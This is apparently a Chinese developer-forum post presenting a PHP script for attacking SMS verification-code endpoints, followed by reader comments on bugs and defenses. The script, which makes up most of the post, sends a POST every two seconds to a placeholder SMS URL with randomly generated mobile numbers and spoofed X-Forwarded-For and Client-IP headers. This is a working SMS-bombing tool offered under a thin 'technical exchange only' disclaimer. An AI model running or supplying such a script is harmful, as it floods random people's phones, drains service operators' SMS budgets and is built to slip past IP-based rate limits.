PHP 攻击短信验证码接口

声明 仅供技术交流,如有其它非法用途,和本博客无关

代码如下

<?php
header("Content-type: text/html; charset=utf-8");
ini_set('display_errors','On');
function curl_post($url, array $params = array(),$ip, $timeout)
{
    $this_header = array(
        "charset=UTF-8",
        'X-FORWARDED-FOR:'.$ip,
        'CLIENT-IP:'.$ip
    );
    $ch = curl_init();//初始化
    curl_setopt($ch, CURLOPT_URL, $url);//抓取指定网页
    curl_setopt($ch,CURLOPT_HTTPHEADER,$this_header);
    curl_setopt($ch, CURLOPT_HEADER, 0);//设置header
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.81 Chrome/43.0.2357.81 Safari/537.36");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $data = curl_exec($ch);//运行curl
    curl_close($ch);
    return ($data);
}
swoole_timer_tick(2000, function ($timer_id) {
    $ip = get_rand_ip();
    $phone = getPhone();
    //这里添加短信验证码接口ur,并传入对应手机号参数(参数key看你要攻击的接口是啥,我这里是phone)
    $res = curl_post('替换成短信接口url',['phone'=>$phone],$ip,30);
    if($res == '0'){
        echo '验证码发送成功phone:'.$phone.'time:'.date('Y-m-d H:i:s').' 虚拟ip:'.$ip.PHP_EOL;
    }else{
        echo $res.PHP_EOL;
    }
});

function getPhone()
{
    $arr = array(
        130,131,132,133,134,135,136,137,138,139,
        144,147,
        150,151,152,153,155,156,157,158,159,
        176,177,178,
        180,181,182,183,184,185,186,187,188,189,
    );
    return $arr[array_rand($arr)].mt_rand(1000,9999).mt_rand(1000,9999);
}

function get_rand_ip(){
    $arr_1 = array("218","218","66","66","218","218","60","60","202","204","66","66","66","59","61","60","222","221","66","59","60","60","66","218","218","62","63","64","66","66","122","211");
    $randarr= mt_rand(0,count($arr_1) - 1);
    $ip1id = $arr_1[$randarr];
    $ip2id=  round(rand(600000,  2550000)  /  10000);
    $ip3id=  round(rand(600000,  2550000)  /  10000);
    $ip4id=  round(rand(600000,  2550000)  /  10000);
    return  $ip1id . "." . $ip2id . "." . $ip3id . "." . $ip4id;
}
《L03 构架 API 服务器》
你将学到如 RESTFul 设计风格、PostMan 的使用、OAuth 流程,JWT 概念及使用 和 API 开发相关的进阶知识。
《L05 电商实战》
从零开发一个电商项目,功能包括电商后台、商品 & SKU 管理、购物车、订单管理、支付宝支付、微信支付、订单退款流程、优惠券等
讨论数量: 9

curl_post($url, array $params = array(),$ip, $timeout) array $params = array()得放最后把

3个月前

$randarr= mt_rand(0,count($arr_1))应该改成$randarr= mt_rand(0,count($arr_1)-1)

3个月前
woann

@王哲军 对,我记得是取中间的,然而是包括的。。

3个月前
HI

现在发短信接口都有滑块验证或验证码验证,通过了才给发短信的,只能说想象很美好 = =

3个月前
woann

@HI 你会发现总有没有验证码的,这篇文章也是在提醒大家短信验证码中,图形验证码的必要性

3个月前
allen9009

图灵测试的年代

2个月前

短信服务商一般都有限制把?就算程序不限制

2个月前
Aaron

@Code_Er 嗯,短信服务商会有限制

2个月前
loveinalife

喜闻乐见 :joy:

1个月前

请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!